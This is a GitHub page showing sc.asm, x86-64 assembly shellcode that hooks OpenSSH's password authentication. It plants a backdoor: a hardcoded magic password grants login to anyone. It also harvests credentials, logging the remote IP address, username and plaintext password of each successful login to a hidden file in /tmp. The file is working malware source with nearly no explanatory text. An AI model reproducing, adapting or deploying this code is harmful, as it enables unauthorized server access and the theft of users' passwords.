-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy pathsc.asm
124 lines (98 loc) · 1.7 KB
/
sc.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
%define sys_write 1
%define sys_open 2
%define sys_close 3
%define O_CLOEXEC 0x80000
%define O_APPEND 0x400
%define O_CREAT 0x40
%define O_RDWR 0x2
BITS 64
john_cena_jump:
db 0xe9, 0x0, 0x0, 0x0, 0x0
check_magic_pass:
lea rcx, [rel magic_pass]
mov rdx, rsi
loop:
mov al, [rdx]
cmp al, [rcx]
jne continue
test al, al
jz magic_pass_success
inc rdx
inc rcx
jmp loop
magic_pass_success:
mov al, 1
return: ret
continue:
;;; dirty trick to keep stack alignment
push rdi
push rdi
push rsi
;;; call real auth_password function
call john_cena_jump
pop rsi
pop rdi
pop rdi
;;; test if authentication is valid
test eax, eax
jz return
;;; save parameters
mov r8, rdi
mov r9, rsi
;;; try open the file ---
xor rsi, rsi
mul rsi
mov al, sys_open
lea rdi, [rel logfile]
mov esi, O_CLOEXEC | O_APPEND | O_CREAT | O_RDWR
mov dx, 0644
syscall
;;; check if the file is opened successfully
test rax, rax
js magic_pass_success
;;; restore parameters
mov rdi, r8
mov rsi, r9
;;; magic
lea r8, [rsp-8]
; offsetof(struct ssh, remote_ipaddr)
lea rcx, [rdi+16]
mov rcx, [rcx]
call stack_copy
; offsetof(struct ssh, authctxt);
lea rcx, [rdi+0x860]
mov rcx, [rcx]
; offsetof(struct Authctxt, user);
lea rcx, [rcx+0x20]
mov rcx, [rcx]
call stack_copy
; password
mov rcx, rsi
call stack_copy
;;; end of magic
mov rdi, rax
xor rax, rax
mov al, sys_write
mov rsi, r8
lea rdx, [rsp-8]
sub rdx, r8
syscall
xor rax, rax
mov al, sys_close
syscall
inc eax
ret
; copy rcx to stack
stack_copy:
xchg rsp, r8
myloop:
dec rsp
mov dl, [rcx]
mov [rsp], dl
inc rcx
test dl, dl
jnz myloop
xchg rsp, r8
ret
magic_pass: db 'anneeeeeeeeeeee', 0x0
logfile: db '/tmp/.nothing', 0x0